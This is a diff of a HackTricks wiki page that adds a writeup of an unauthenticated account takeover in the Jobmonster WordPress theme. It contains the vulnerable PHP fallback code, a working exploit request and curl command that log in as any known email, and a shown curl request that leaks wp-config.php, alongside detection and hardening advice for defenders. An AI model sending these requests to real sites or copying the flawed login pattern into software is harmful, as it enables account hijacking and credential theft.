mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1421 from HackTricks-wiki/update_Unauthenticated_Broken_Authentication_Vulnerabilit_20250919_123745
Unauthenticated Broken Authentication Vulnerability in WordP...
This commit is contained in:
		
						commit
						98272baea0
					
				| @ -766,6 +766,92 @@ curl -G https://victim.com/wp-admin/admin-post.php \ | ||||
| ``` | ||||
| The server responds with the contents of `wp-config.php`, leaking DB credentials and auth keys. | ||||
| 
 | ||||
| ## Unauthenticated account takeover via Social Login AJAX fallback (Jobmonster Theme <= 4.7.9) | ||||
| 
 | ||||
| Many themes/plugins ship "social login" helpers exposed via admin-ajax.php. If an unauthenticated AJAX action (wp_ajax_nopriv_...) trusts client-supplied identifiers when provider data is missing and then calls wp_set_auth_cookie(), this becomes a full authentication bypass. | ||||
| 
 | ||||
| Typical flawed pattern (simplified) | ||||
| 
 | ||||
| ```php | ||||
| public function check_login() { | ||||
|     // ... request parsing ... | ||||
|     switch ($_POST['using']) { | ||||
|         case 'fb':     /* set $user_email from verified Facebook token */ break; | ||||
|         case 'google': /* set $user_email from verified Google token   */ break; | ||||
|         // other providers ... | ||||
|         default: /* unsupported/missing provider – execution continues */ break; | ||||
|     } | ||||
| 
 | ||||
|     // FALLBACK: trust POSTed "id" as email if provider data missing | ||||
|     $user_email = !empty($user_email) | ||||
|         ? $user_email | ||||
|         : (!empty($_POST['id']) ? esc_attr($_POST['id']) : ''); | ||||
| 
 | ||||
|     if (empty($user_email)) { | ||||
|         wp_send_json(['status' => 'not_user']); | ||||
|     } | ||||
| 
 | ||||
|     $user = get_user_by('email', $user_email); | ||||
|     if ($user) { | ||||
|         wp_set_auth_cookie($user->ID, true); // 🔥 logs requester in as that user | ||||
|         wp_send_json(['status' => 'success', 'message' => 'Login successfully.']); | ||||
|     } | ||||
|     wp_send_json(['status' => 'not_user']); | ||||
| } | ||||
| // add_action('wp_ajax_nopriv_<social_login_action>', [$this, 'check_login']); | ||||
| ``` | ||||
| 
 | ||||
| Why it’s exploitable | ||||
| 
 | ||||
| - Unauthenticated reachability via admin-ajax.php (wp_ajax_nopriv_… action). | ||||
| - No nonce/capability checks before state change. | ||||
| - Missing OAuth/OpenID provider verification; default branch accepts attacker input. | ||||
| - get_user_by('email', $_POST['id']) followed by wp_set_auth_cookie($uid) authenticates the requester as any existing email address. | ||||
| 
 | ||||
| Exploitation (unauthenticated) | ||||
| 
 | ||||
| - Prerequisites: attacker can reach /wp-admin/admin-ajax.php and knows/guesses a valid user email. | ||||
| - Set provider to an unsupported value (or omit it) to hit the default branch and pass id=<victim_email>. | ||||
| 
 | ||||
| ```http | ||||
| POST /wp-admin/admin-ajax.php HTTP/1.1 | ||||
| Host: victim.tld | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| 
 | ||||
| action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com | ||||
| ``` | ||||
| 
 | ||||
| ```bash | ||||
| curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \ | ||||
|   -d "action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com" | ||||
| ``` | ||||
| 
 | ||||
| Expected success indicators | ||||
| 
 | ||||
| - HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}. | ||||
| - Set-Cookie: wordpress_logged_in_* for the victim user; subsequent requests are authenticated. | ||||
| 
 | ||||
| Finding the action name | ||||
| 
 | ||||
| - Inspect the theme/plugin for add_action('wp_ajax_nopriv_...', '...') registrations in social login code (e.g., framework/add-ons/social-login/class-social-login.php). | ||||
| - Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers. | ||||
| 
 | ||||
| Detection checklist | ||||
| 
 | ||||
| - Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=<email>. | ||||
| - 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent. | ||||
| 
 | ||||
| Hardening | ||||
| 
 | ||||
| - Do not derive identity from client input. Only accept emails/IDs originating from a validated provider token/ID. | ||||
| - Require CSRF nonces and capability checks even for login helpers; avoid registering wp_ajax_nopriv_ unless strictly necessary. | ||||
| - Validate and verify OAuth/OIDC responses server-side; reject missing/invalid providers (no fallback to POST id). | ||||
| - Consider temporarily disabling social login or virtually patching at the edge (block the vulnerable action) until fixed. | ||||
| 
 | ||||
| Patched behaviour (Jobmonster 4.8.0) | ||||
| 
 | ||||
| - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) | ||||
| @ -778,4 +864,6 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials | ||||
| - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) | ||||
| - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) | ||||
| 
 | ||||
| - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user